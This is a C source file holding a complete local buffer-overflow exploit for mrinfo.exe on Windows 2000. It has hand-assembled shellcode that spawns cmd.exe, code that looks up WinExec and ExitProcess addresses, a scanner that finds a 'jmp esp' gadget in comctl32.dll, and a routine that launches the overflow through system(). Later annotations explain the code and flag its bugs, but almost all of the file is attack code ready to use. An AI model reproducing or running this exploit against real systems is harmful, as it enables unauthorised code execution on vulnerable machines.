/**********************************************************************/
/* [*] EDUCATIONAL PURPOSE ONLY DOESN'T GIVE ANY ADMIN RIGHTS [*] */
/**********************************************************************/
/** mrinfo.exe exploit for win2k only (winXP causes an exception **/
/** when it jumps to the jmp esp offset [in comctl32.dll] why?). **/
/**********************************************************************/
/******************** coded by Scurt && kralor ************************/
/*********************** comments by kralor ***************************/
/******************** http://www.coromputer.net ***********************/
/*********************** undernet #coromputer *************************/
/**********************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <conio.h>
#include <windows.h>
#define RET_DLL "comctl32.dll"
#define EXE "mrinfo.exe"
/***********************************************************************/
/**** int hardcore(char *buffer, char *lib, char *function, int pos) ***/
/***********************************************************************/
/* Function that puts the offset of a function from */
/* a dll into a buffer at the desired place. */
/***********************************************************************/
/* by kralor */
/***********************************************************************/
/*
 * hardcore: resolve the exported symbol `function` from `library` and
 * store the resolved address into `buffer` at byte index `pos`.
 *
 * Exactly 4 bytes are written (buffer[pos] .. buffer[pos+3]), copied
 * from the pointer's in-memory representation, i.e. this assumes a
 * 32-bit pointer. The caller owns `buffer` and must guarantee that
 * pos + 4 fits inside it; nothing here checks that bound.
 *
 * Returns 0 on success, -1 if LoadLibrary fails, -2 if GetProcAddress
 * does not find the symbol. The library handle is never released, so
 * the module stays loaded for the rest of the process.
 */
int hardcore(char *buffer,char *library,char *function, int pos)
{
	HMODULE module = LoadLibrary(library);
	if (module == NULL) {
		return -1;
	}
	void *address = GetProcAddress(module, function);
	if (address == NULL) {
		return -2;
	}
	/* Copy the pointer byte by byte, in native (x86: little-endian) order. */
	const char *raw = (const char *)&address;
	for (int k = 0; k < 4; k++) {
		buffer[pos + k] = raw[k];
	}
	return 0;
}
/***********************************************************************/
/**** char *scan_dll(char *lib) ***/
/***********************************************************************/
/* Function that scans a dll looking for the famous 2 opcodes */
/* jmp esp (0xff && 0xe4) and returns the offset */
/***********************************************************************/
/* by Scurt */
/***********************************************************************/
/*
 * scan_dll: load `lib`, walk its mapped image from the module base and
 * find the first 0xff 0xe4 byte pair (jmp esp). The address of that pair
 * is returned packed into a heap buffer of 4 raw bytes, most significant
 * byte first (ret[0] is the high byte; main() reverses them).
 *
 * Returns 0 (NULL) when the library cannot be loaded.
 *
 * Ownership: the returned buffer comes from malloc and is never freed by
 * the caller in this file. The LoadLibrary handle is never released.
 *
 * NOTE(review): the search loop below has no upper bound. If the byte
 * pair never occurs, i walks past the end of the mapped image and the
 * read faults instead of returning an error.
 */
char *scan_dll(char *lib)
{
char nret[10]={0}; /* one decoded hex nibble per character of the text form */
char *ret; /* first used as a text buffer, then reused for the 4 raw bytes */
HMODULE offset; /* module base; scanned as a raw BYTE array below */
BOOL end = FALSE;
int i=0;
int y;
offset=LoadLibrary(lib);
if(!offset)
return 0;
ret=(char*)malloc(10); /* NOTE(review): allocation result is never checked */
while(!end)
{
/* 0xff && 0xe4 == jmp esp */
/* 0xff && 0xd4 == call esp */
if((( BYTE *)offset)[i] == 0xff && (( BYTE *)offset)[i+1] == 0xe4)
{
/* The address is rendered as lowercase hex text ("%x" applied to a
 * pointer argument, which is a format/argument mismatch) and then
 * decoded back into bytes by hand in the loop below. */
sprintf(ret,"%x",&(( BYTE *)offset)[i]);
end= TRUE;
}
i++;
}
/* Decode each of the 10 characters from ASCII hex to a nibble:
 * '0'..'9' become 0..9 through the -48 ('0') subtraction; 'a'..'f'
 * land at 49..54, and the switch maps (value-33) = 16..21 to 0x0a..0x0f.
 * Any other character (including the NUL terminator) is left as the raw
 * difference.
 * NOTE(review): an 8-digit address occupies ret[0..7] plus the
 * terminator at ret[8]; ret[9] is read here without ever having been
 * written, since malloc does not zero the buffer. */
for(y=0;y<10;y++)
{
nret[y]=ret[y]-48;
if(nret[y]>10){
switch((nret[y]-33))
{
case 16:
nret[y]=0x0a;
break;
case 17:
nret[y]=0x0b;
break;
case 18:
nret[y]=0x0c;
break;
case 19:
nret[y]=0x0d;
break;
case 20:
nret[y]=0x0e;
break;
case 21:
nret[y]=0x0f;
break;
}
}
}
/* NOTE(review): sizeof(ret) is the size of the pointer variable, not of
 * the 10-byte allocation, so only the first 4 (or 8) bytes are cleared. */
memset(ret,0,sizeof(ret));
/* Pack nibble pairs into raw bytes, high byte first; ret[4..] is unused. */
ret[0]=nret[0]*0x10+nret[1];
ret[1]=nret[2]*0x10+nret[3];
ret[2]=nret[4]*0x10+nret[5];
ret[3]=nret[6]*0x10+nret[7];
return ret;
}
/*
 * Entry point. Resolves the two kernel32 addresses the shellcode calls,
 * patches them into the shellcode, locates a jmp esp in RET_DLL, builds
 * the EXE command line in a fixed 128-byte stack buffer and runs it
 * through system().
 *
 * Returns 0 on success, -1 if a kernel32 symbol cannot be resolved,
 * 1 if scan_dll() fails.
 */
int main(void)
{
char *ret; /* 4 raw address bytes from scan_dll(); heap-allocated, never freed here */
char buffer[128]; /* command line; NOTE(review): the sprintf below is not bounded by sizeof buffer */
char* pbuffer;
char* pshellcode;
HMODULE mod; /* second handle to kernel32, used only for the diagnostic printf */
/*
the shellcode in C looks like this:
WinExec("cmd",SW_SHOW);
ExitProcess(0x69);
huh..
*/
/* The two 0x69696969 immediates are placeholders that hardcore() overwrites
 * with the real addresses at runtime (byte offsets 24 and 33, see below). */
char shellcode[]= /* only a simple shellcode to spawn a shell */
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xEB\x14" /* jmp there --- */
/*here: <---|- */
"\x58" /* pop eax || */
"\x6A\x05" /* push 0x05 || */
"\x50" /* push eax ("cmd") || */
"\xB8\x69\x69\x69\x69" /* mov eax, 69696969h || */
"\xFF\xD0" /* call eax (WinExec) || */
"\x6A\x69" /* push 0x69 || */
"\xB8\x69\x69\x69\x69" /* mov eax, 69696969h || */
"\xFF\xD0" /* call eax (ExitProcess) || */
/*there: <--| */
"\xE8\xEB\xFF\xFF\xFF" /* call here ---- */
"\x63\x6D\x64"; /* "cmd" */
printf("[*] Getting WinExec && ExitProcess addresses ...");
/* Offset 24: 17 NOPs + 6 bytes of code + the 0xB8 opcode precede the
 * first 4-byte immediate. Offset 33: 4 + 2 + 2 + 1 more bytes precede
 * the second one. Both offsets are tied to the exact byte layout above. */
if(hardcore(shellcode,"kernel32.dll","WinExec", 24)) {
printf("error: unable to find WinExec function ...\r\n");
return -1;
}
if(hardcore(shellcode,"kernel32.dll","ExitProcess", 33)) {
printf("error: unable to find ExitProcess function ...\r\n");
return -1;
}
printf("Done\r\n");
/* Diagnostic only. NOTE(review): mod is not checked for NULL, and a
 * pointer is passed for "%x" (a format/argument mismatch; "%p" fits). */
mod=LoadLibrary("kernel32.dll");
printf("WinExec : 0x%x\r\n",GetProcAddress(mod,"WinExec"));
printf("ExitProcess: 0x%x\r\n",GetProcAddress(mod,"ExitProcess"));
printf("[*] Searching 'jmp esp' opcodes in %s ...",RET_DLL);
ret=scan_dll(RET_DLL);
if(!ret) {
printf("error: unable to find 'jmp esp' opcodes in %s\r\n",RET_DLL);
return 1;
}
printf("Done\r\n");
/* Each byte is printed with "%x" and no width, so values below 0x10
 * show as a single digit. */
printf("jmp esp : 0x%x%x%x%x\r\n",(unsigned char)ret[0],(unsigned char)ret[1],(unsigned char)ret[2],(unsigned char)ret[3]);
pbuffer=&buffer[0];
pshellcode=&shellcode[0];
/* The address bytes are emitted in reverse order (ret[3] first) because
 * scan_dll() packs them high byte first. The shellcode is copied with
 * "%s", so it is treated as a NUL-terminated string. */
sprintf(pbuffer,"%s -i AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%c%c%c%c%s",EXE,ret[3],ret[2],ret[1],ret[0],pshellcode);
printf("[*] Executing shellcode through %s ...",EXE);
/* Runs the constructed command line through the shell; its exit status
 * is ignored. */
system(buffer);
printf("Done\r\n");
Sleep(1000); /* presumably gives the child time to start before this process exits */
return 0;
}




